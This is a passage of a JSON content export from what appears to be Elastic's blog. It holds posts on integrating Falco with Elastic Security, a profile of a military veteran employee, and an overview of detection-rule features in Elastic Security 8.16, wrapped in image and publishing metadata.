style=\"font-size: 12pt;\"\u003e Falco provides an additional layer of security close to your workloads.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCentralized analysis:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Security analysts can triage Falco alerts alongside other security data sources in a familiar, centralized environment.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEnhanced contextualization:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Correlation of Falco alerts with other security data provides richer context for faster threat response.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eScalability:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Your expanding infrastructure gains consistent security coverage.\u003c/span\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"Flexible integration options: Seamless data ingestion","_metadata":{"uid":"csdce8b85a39a18e32"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe understand that every organization has unique needs and existing infrastructure. That's why we've developed two flexible methods for integrating Falco with Elastic Security.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e1. Falcosidekick forwarding:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e We've \u003c/span\u003e\u003ca href=\"https://github.com/falcosecurity/falcosidekick/pulls?q=is%3Apr+author%3Aaleksmaus\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ecollaborated\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e with the Falco community to improve Falcosidekick, optimizing its capabilities for writing security alert data directly into Elasticsearch. This method is ideal for environments already using Falco and looking to seamlessly integrate with Elastic Security.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs52439f00d7e2b556"}}},{"image":{"image":{"uid":"blt3ddc338519dc8917","_version":1,"title":"image2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-12T20:05:05.942Z","updated_at":"2024-11-12T20:05:05.942Z","content_type":"image/png","file_size":"183745","filename":"image2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-14T15:02:23.034Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3ddc338519dc8917/6733b4f1dec4ef5ef27cee0e/image2.png"},"_metadata":{"uid":"csa53f5addab4354f2"},"caption_l10n":"","alt_text_l10n":"falco push flowchart","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs35f696bb1b99438f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e2. Elastic Agent integration:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e For customers already using the Elastic Agent in their environment, we've built an out-of-the-box \u003c/span\u003e\u003ca href=\"https://www.elastic.co/docs/current/integrations/falco\"\u003e\u003cspan style='font-size: 12pt;'\u003eFalco integration\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e following our native Elastic Agent deployment method. This option allows for easy adoption within existing Elastic ecosystems.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csaf174508edf3bf5f"}}},{"image":{"image":{"uid":"blt37b581bc246e05f4","_version":1,"title":"image1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-12T20:05:14.422Z","updated_at":"2024-11-12T20:05:14.422Z","content_type":"image/png","file_size":"404802","filename":"image1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-14T15:02:23.072Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt37b581bc246e05f4/6733b4fae8347d83ce0a4572/image1.png"},"_metadata":{"uid":"cs62105ed721a8e1d4"},"caption_l10n":"","alt_text_l10n":"falco integration page","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1dd237c4e18eb48e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBoth methods ensure that Falco data is normalized into the Elastic Common Schema (ECS) format using Elasticsearch ingest pipelines. This facilitates effective correlation with other security data sources and integrates into existing security analyst triage workflows within Elastic Security to ensure a consistent and efficient analysis process.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The power of open source","_metadata":{"uid":"csaced75da102ae138"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIt's worth highlighting that both CNCF security tools and Elastic Security are open source projects. This commitment to openness not only fosters innovation but also allows for greater customization and community driven improvements. By combining these two powerful open source ecosystems, we're creating a solution that's flexible, transparent, and continuously evolving to meet the complex security needs of modern cloud environments.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Building your CDR strategy with Elastic Security","_metadata":{"uid":"csb3716cef097ab1f8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIntegrating Falco with Elastic Security is just one example of how we're reimagining CDR. By centralizing diverse security data streams, we're enabling security teams to:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eQuickly piece together the entire story of an attack\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCorrelate events across different cloud services and environments\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAutomatically build attack chains for more effective incident response\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReduce alert fatigue by providing contextualized high-fidelity alerts\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"Take your cloud security to the next level","_metadata":{"uid":"csf42a140653ae0027"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe've made it easy to get started with ingesting Falco data into Elastic Security. Visit our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/ingest-falco.html\"\u003e\u003cspan style='font-size: 12pt;'\u003edocumentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for step-by-step instructions on setting up this integration.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFalco's edge detection capabilities are now combined with Elastic Security's powerful analysis and correlation features, so you get a comprehensive solution for cloud workload protection. For an in-depth technical dive, take a look at \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/falco-elastic-security-cloud-workload-protection\"\u003e\u003cspan style='font-size: 12pt;'\u003ehow to set up Falco, understand its rule-based detection system, and more\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This integration represents our commitment to providing the tools you need to safeguard digital assets in today’s complex cloud environments.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eStay tuned for more updates as we continue to expand our integrations and enhance our security offerings. Together, we're building a more secure digital future.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd8ff75bba6eb54c8"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs37b50ac2ccaada79"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs39f9e044e67e6ae1"}}}],"publish_date":"2024-11-14","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Elastic and CNCF tools: Next-generation cloud detection and response","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt4eb0f5c53cfcb73a","ACL":{},"created_at":"2023-11-06T20:43:57.712Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"open-source-standards","label_l10n":"Open source/standards","tags":[],"title":"Open source/standards","updated_at":"2023-11-06T20:43:57.712Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:38:21.485Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt69c983c8bb0db1e7","_version":1,"title":"cloud-images-blog-headers-07 (1).jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-12T19:34:28.263Z","updated_at":"2024-11-12T19:34:28.263Z","content_type":"image/jpeg","file_size":"158699","filename":"cloud-images-blog-headers-07_(1).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-14T15:02:23.054Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt69c983c8bb0db1e7/6733adc4adf8c516c1fbf9ab/cloud-images-blog-headers-07_(1).jpg"},"title":"Extended protections for cloud using CNCF open source security tools","title_l10n":"Extended protections for cloud using CNCF open source security tools","updated_at":"2024-11-18T01:53:09.496Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/cncf-open-source-security-tools","publish_details":{"time":"2024-11-18T01:53:15.796Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt73116f15b3535a4d","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"Luke was interning at Elastic when he found out he was leaving the military much sooner than expected. Here’s how he made the transitions and his advice for others.","author":["blt7fc3768df8cad1f6"],"category":["bltc253e0851420b088"],"created_at":"2024-11-15T18:58:35.086Z","created_by":"blte369ea3bcd6ac892","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0f64cf64e01ba0a8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLuke Cavanaugh spent almost 13 years in the US Air Force before he was declared medically unfit for service — and just six weeks later, he became a civilian.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBecause it was a medical discharge, he didn’t originally have a set termination date.\u0026nbsp;\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eInstead, during the first week of his internship at Elastic, Luke found out he was leaving the military much sooner than expected. He had to quickly discuss becoming a full-time employee with his manager.\u003cbr /\u003e\u003cbr /\u003eLuke became a full-time employee at Elastic in May 2024 as a renewals associate. He recently transitioned from that role to a global RFP project manager, where he sets up proposal management programs.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“I wrote performance work statements in the military, so I know how to write them with my community in mind,” Luke says.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHe uses that military experience and a variety of other skills he learned for his job at Elastic. For example, Luke was used to collecting and collating information.\u003cbr /\u003e\u003cbr /\u003e“There’s a lot you won’t know,” Luke says. “I learned how to seek out that information by leveraging SMEs and other resources and consolidate it into actionable items.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHe’s also adept at bringing communities together to achieve a unified goal. While in the US Air Force, he completed his Joint Terminal Attack Controller (JTAC) Evaluator certification. In performing that role, Luke was responsible for bridging the gap between the US Army and the US Air Force.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“I take that skill of bringing everyone together and use it when setting a deal or working on a project,” he says.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhile Luke landed at a job he loves, the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-how-elastic-and-skillbridge-help-bridge-the-gap-between-military-and-civilian-life\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003etransition from military service to civilian life\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e was daunting. His top priority was to find a high-functioning community. When he heard about the Elastic culture from other veterans at the company, it seemed like a good fit, Luke says.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHe is also a part of the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-ergs-encourage-you-to-come-as-you-are-meet-mil-asticians\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMil-asticians ERG\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — a group for military veterans and their allies.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“The best part is the community and camaraderie,” Luke says. “Everyone shares. We share information, legacy, heritage, what we did [in the military]. You have a network within a network that has a shared connection to their service.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLuke comes from a long line of veterans, and both of his brothers also served — he is very service-driven. He joined the US Air Force at 18 years old, so when he left 12.5 years later, it was challenging.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“My entire adult life was in the military, so it was a big change,” he says. “It was challenging and intimidating. Transitioning is tough. It's all you’ve ever known. The \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMil-asticians group is very welcoming; they make you feel at home.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor others leaving the military or planning to start their transition to civilian life, Luke recommends taking the tangible skills learned in the military and figuring out how to apply them.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLuke worked with mentors who were familiar with what he did in the military. They gave him advice and helped direct him to a job that matched his skill set.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHe also says to take the leap into a new community and industry and to start over fresh.\u003cbr /\u003e\u003cbr /\u003e“Everyone is willing to help you.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eLooking for a company that can help you make a smooth transition? \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/careers/?baymax=web\u0026elektra=culture-finding-community-military-transition\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBrowse open roles\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003e.\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 8pt;\"\u003e\u003cem\u003eElastic, Elasticsearch and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs78e65f58cb1f067f"}}}],"publish_date":"2024-11-15","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[{"uid":"bltf53e7d9e6890ffe1","_content_type_uid":"tags_culture"}],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt2249630930a17b6e","_version":1,"title":"166426-milasticiansspotlight-luke-f_166426-milasticiansspotlight-luke-720x420-opt1.png","created_by":"blte369ea3bcd6ac892","updated_by":"blte369ea3bcd6ac892","created_at":"2024-11-15T18:57:50.532Z","updated_at":"2024-11-15T18:57:50.532Z","content_type":"image/png","file_size":"75269","filename":"166426-milasticiansspotlight-luke-f_166426-milasticiansspotlight-luke-720x420-opt1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-15T19:02:29.445Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2249630930a17b6e/673799ae821ff07c5a9d6978/166426-milasticiansspotlight-luke-f_166426-milasticiansspotlight-luke-720x420-opt1.png"},"title":"Luke Cavanaugh’s advice for veterans seeking a new community","title_l10n":"Luke Cavanaugh’s advice for veterans seeking a new community ","updated_at":"2024-11-15T19:01:49.785Z","updated_by":"blte369ea3bcd6ac892","url":"/blog/culture-finding-community-military-transition","publish_details":{"time":"2024-11-15T19:02:29.259Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt638e57bcc3fab480","_version":20,"locale":"en-us","ACL":{},"abstract_l10n":"This blog provides an overview of the detection capabilities present in the latest Elastic Security release. Check out new features and learn more tips and tricks with the existing ones!","author":["blt57a714298299b145"],"category":["bltb79594af7c5b4199"],"created_at":"2024-10-24T17:19:18.128Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse39ed0495e8167c4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhether you’re a dedicated detection engineer or you wear multiple hats, welcome! Thanks for stopping by to read about the tools that Elastic Security has for you.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFirst, let's briefly go through the new capabilities added in Elastic Security 8.16.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/alert-suppression.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAlert suppression\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for Elasticsearch Query Language (ES|QL), machine learning (ML), threshold, indicator match, and new terms rule types are now fully supported and generally available. With suppression, you can reduce the volume of similar alerts (per rule run or window of time), resulting in decreased alert fatigue and time-efficient alert triage. Suppression capabilities require a Platinum or higher license tier.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWith \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-management.html#manually-run-rules\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003emanual rule runs\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, you can now test your rule or rerun it over the selected period up to 90 days in the past, which helps detection engineers assess the quality and noise level of the newly designed rule using historical events. This functionality is available at the Standard tier and is in beta as we continue to develop additional features.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSecurity teams can now automatically \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/cases-action-type.html\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecreate a case\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for Elastic Security alerts to streamline investigations with aggregation capabilities that combine multiple alerts into a single case. It is currently available in technical preview.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThere is a new option to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/prebuilt-rules-management.html#load-prebuilt-rules\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eenable prebuilt rules at the time of installation\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to make this process more smooth.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEnhanced \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#preview-rules\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003erule preview\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for EQL and ES|QL rules with the option to view Elasticsearch requests that will be executed.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eNow that we’ve discussed the specifics of 8.16, we’ll dive deeper into all of the threat detection capabilities.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd01591f74800e976"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"csd68e659feed3ddd9"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNote:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e We are covering \u003c/span\u003e\u003ca href=\"https://www.elastic.co/getting-started/security/detect-threats-in-my-data-with-siem\"\u003e\u003cspan style='font-size: 12pt;'\u003eSIEM\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e detection capabilities. To learn more about endpoint security and native detection and protection capabilities provided by Elastic Security, please refer to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/getting-started/security/secure-my-hosts-with-endpoint-security\"\u003e\u003cspan style='font-size: 12pt;'\u003ethis page\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"Getting started with the prebuilt Elastic rules","_metadata":{"uid":"cs64f09233fead4aa8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you just started using Elastic Security, we got you covered with initial detection rules selection.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt the time of writing this blog (v8.16), we have more than 1,230 out-of-the-box SIEM detection rules across 54 different data sources and over 70 machine learning jobs — both trained models and anomaly detection jobs — to get started.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can choose which rules to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/prebuilt-rules-management.html#load-prebuilt-rules\"\u003e\u003cspan style='font-size: 12pt;'\u003einstall\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and preview their content to understand the logic and additional details.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9c2b5aa666fc2ea1"}}},{"image":{"image":{"uid":"bltb58c8c19e1851f33","_version":1,"title":"1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:15:11.148Z","updated_at":"2024-10-25T17:15:11.148Z","content_type":"image/png","file_size":"244102","filename":"1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.167Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb58c8c19e1851f33/671bd21f9b78e777ee5354ad/1.png"},"_metadata":{"uid":"cs553b6fed2fb8eea3"},"caption_l10n":"Figure 1. Prebuilt Elastic rules preview and installation","alt_text_l10n":"Figure 1. Prebuilt Elastic rules preview and installation","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1a98fefec8ced5d8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith 8.16, when you are installing the rule, you can \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/prebuilt-rules-management.html#load-prebuilt-rules\"\u003e\u003cspan style='font-size: 12pt;'\u003eimmediately enable it\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e at the time of installation.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa9635b632af476ad"}}},{"image":{"image":{"uid":"blt8760d115ae3c9f4e","_version":1,"title":"2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:15:23.252Z","updated_at":"2024-10-25T17:15:23.252Z","content_type":"image/png","file_size":"54641","filename":"2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.319Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8760d115ae3c9f4e/671bd22bf66b7254319b94b9/2.png"},"_metadata":{"uid":"csa4868d03c474431a"},"caption_l10n":"Figure 2. Install and enable rules","alt_text_l10n":"Figure 2. Install and enable rules","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf95e6fd30bd01b82"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRules shipped by Elastic provide additional context explaining the rule prerequisites and providing advice on alert investigation — users can check the required data source integrations, setup, and investigation guides for this information. Our rules are mapped to the relevant \u003c/span\u003e\u003ca href=\"https://attack.mitre.org/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMITRE ATT\u0026amp;CK\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e tactics, techniques, and subtechniques, where those can be clearly defined.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWith Elastic Security’s prebuilt rules, we continuously \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eresearch threats\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/security-teams-prebuilt-protections\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eupdate and tune 